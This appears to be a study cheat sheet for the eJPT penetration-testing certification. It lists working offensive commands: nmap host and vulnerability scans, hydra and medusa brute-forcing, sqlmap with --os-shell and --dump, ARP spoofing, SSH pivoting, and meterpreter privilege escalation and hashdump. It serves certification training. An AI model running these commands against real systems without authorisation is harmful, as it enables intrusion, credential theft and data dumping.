1. Please sign up for a FREE https://ine.com account, and complete the Penetration Testing Student course. It is ABSOLUTE FREE! To be honest, everything you need to pass the eJPT is in that free course.
fping -a -g {IP RANGE} 2>/dev/null
fping -a -g 10.10.10.0/8 2>/dev/null
nmap -sn 10.10.10.0/8 | grep -oP '(?<=Nmap scan report for )[^ ]*'
nmap -sC -sV 10.10.10.10
nmap -sC -sV -p- 10.10.10.10
nmap -sU -sV 10.10.10.10
nmap -sn 10.10.10.0/24 -oN hosts.nmap
After you have done all of your scans, and identified open ports on your target, it's time to see if any services are vulnerable.
Port | Protocol |
---|---|
21 | FTP |
22 | SSH |
23 | TELNET |
25 | SMTP |
53 | DNS |
80 | HTTP |
443 | HTTPS |
110 | POP3 |
115 | SFTP |
143 | IMAP |
135 | MSRPC |
137 | NETBIOS |
138 | NETBIOS |
139 | NETBIOS |
445 | SMB |
3306 | MYSQL |
1433 | MYSQL |
3389 | RDP |
nmap -sV --script=vulners -v 10.10.10.1
if you do not have vulners installed, please install here: https://github.com/vulnersCom/nmap-vulners
nmap --script vuln --script-args=unsafe=1 -iL hosts.nmap
Sometimes clues are put here. 😉 Old versions of FTP maybe vulnerable. Always check the version. Search for the exploit using Google / Searchsploit / Rapid7. If you find some credential, try it on SSH / Login page / database.
nmap --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221,tftp-enum -p 21 $ip
nmap --script=ftp-* -p 21 10.10.10.1
ftp 10.10.10.1
ncftp 10.10.10.1
hydra -l $user -P /usr/share/john/password.lst ftp://10.10.10.1:21
hydra -l $user -P /usr/share/wordlistsnmap.lst -f 10.10.10.1 ftp -V
medusa -h 10.10.10.1 -u $user -P passwords.txt -M ftp
ftp-user-enum.pl -U users.txt -t 10.10.10.1
ftp-user-enum.pl -M iu -U users.txt -t $ip
If you do not have ftp-user-enum.pl, you can download it here: https://pentestmonkey.net/tools/ftp-user-enum/ftp-user-enum-1.0.tar.gz
• send # Send single file
• put # Send one file.
• mput # Send multiple files.
• mget # Get multiple files.
• get # Get file from the remote computer.
• ls # list
• mget * # Download everything
• binary = Switches to binary transfer mode.
• ascii = Switch to ASCII transfer mode
• ftpusers
• ftp.conf
• proftpd.conf
• ProFTPD-1.3.3c Backdoor
• ProFTPD 1.3.5 Mod_Copy Command Execution
• VSFTPD v2.3.4 Backdoor Command Execution
1. Gather version numbers
2. Check Searchsploit
3. Check for Default Creds
4. Use Creds previously gathered
5. Download the software
Always check for SMB. You might get lucky and find a vulnerable machine running SMB that has remote code execution. Remember to use searchsploit, or google to check all service versions for publicly available exploits.
nmap -p 139,445 --open -oG smb.txt 192.168.1.0/24
nbtscan -r 192.168.1.0/24
nmblookup -A 10.10.10.1
smbmap -H 10.10.10.1
rpcclient -U "" -N 10.10.10.1
smbclient \\\\$ip\\ShareName
smbclient -L //10.10.10.3/ --option='client min protocol=NT1'
smbmap -H 10.10.1.1
echo exit | smbclient -L \\\\10.10.10.10
nmap --script smb-enum-shares -p 139,445 10.10.10.10
nmap --script smb-vuln* -p 139,445 10.10.10.10
• Windows NT, 2000, and XP (most SMB1) - VULNERABLE: Null Sessions can be created by default
• Windows 2003, and XP SP2 onwards - NOT VULNERABLE: Null Sessions can't be created default
• Most Samba (Unix) servers
• SMB1 – Windows 2000, XP and Windows 2003.
• SMB2 – Windows Vista SP1 and Windows 2008
• SMB2.1 – Windows 7 and Windows 2008 R2
• SMB3 – Windows 8 and Windows 2012.
1. Checkout the entire webpage and what it is displaying.
2. Read every page, look for emails, names, user info, etc.
3. Directory Discovery (time to dir bust!)
4. Enumerate the interface, what is the CMS & Version? Server installation page?
5. Check for potential Local File Inclusion, Remote File Inclusion, SQL Injection, XXE, and Upload vulnerabilities
6. Check for a default server page, identify the server version
7. View Source Code:
a. Check for hidden values
b. Check for comments/developer remarks
c. Check for Extraneous Code
d. Check for passwords
8. Check for robots.txt file
9. Web Scanning
gobuster dir -u 10.10.10.181 -w /usr/share/seclists/Discovery/Web-Content/common.txt
gobuster -u $ip -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/Top1000-RobotsDisallowed.txt; gobuster -u http://10.10.10.10. -w Top1000-RobotsDisallowed.txt
gobuster dir -u http://$ip -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -o gobuster-root -t 50
gobuster -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
gobuster -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .txt,.php
wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --sc 200 http://10.10.10.10/FUZZ
./erodir -u http://10.10.10.10 -e /usr/share/wordlists/dirb/common.txt -t 20
cd /root/dirsearch; python3 dirsearch.py -u http://10.10.10.10/ -e .php
for file in $(ls /usr/share/seclists/Discovery/Web-Content); do gobuster -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/$file -e -k -l -s "200,204,301,302,307" -t 20 ; done
sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
if you follow the above check list, you should have a list of parameters to test for SQL injection. Automate it with SQLMAP!
sqlmap -u http://10.10.10.10 -p parameter
sqlmap -u http://10.10.10.10 --data POSTstring -p parameter
sqlmap -u http://10.10.10.10 --os-shell
sqlmap -u http://10.10.10.10 --dump
unshadow passwd shadow > unshadow
john -wordlist /path/to/wordlist -users=users.txt hashfile
I highly recommend that you get comfortable with general networking and routing concepts, including be able to read and understand .PCAP files.
ip route - prints the routing table for the host you are on
ip route add ROUTETO via ROUTEFROM - add a route to a new network if on a switched network and you need to pivot
echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i tap0 -t 10.10.10.10 -r 10.10.10.11
# local port forwarding
# the target host 192.168.0.100 is running a service on port 8888
# and you want that service available on the localhost port 7777
ssh -L 7777:localhost:8888 [email protected]
# remote port forwarding
# you are running a service on localhost port 9999
# and you want that service available on the target host 192.168.0.100 port 12340
ssh -R 12340:localhost:9999 [email protected]
# Local proxy through remote host
# You want to route network traffic through a remote host target.host
# so you create a local socks proxy on port 12001 and configure the SOCKS5 settings to localhost:12001
ssh -C2qTnN -D 12001 [email protected]
You may need to bruteforce a service running, such as SSH, FTP, etc. Just replace the service name below to bruteforce.
hydra -L users.txt -P pass.txt -t 10 10.10.10.10 ssh -s 22
hydra -L users.txt -P pass.txt telnet://10.10.10.10
I highly recommend getting comfortable with metasploit, and meterpreter just incase you find Remote Code Execution, and spawn a shell.
search x
use x
info
show options, show advanced options
SET X (e.g. set RHOST 10.10.10.10, set payload x)
background
sessions -l
sessions -i 1
sysinfo, ifconfig, route, getuid
getsystem (privesc)
bypassuac
download x /root/
upload x C:\\Windows
shell
use post/windows/gather/hashdump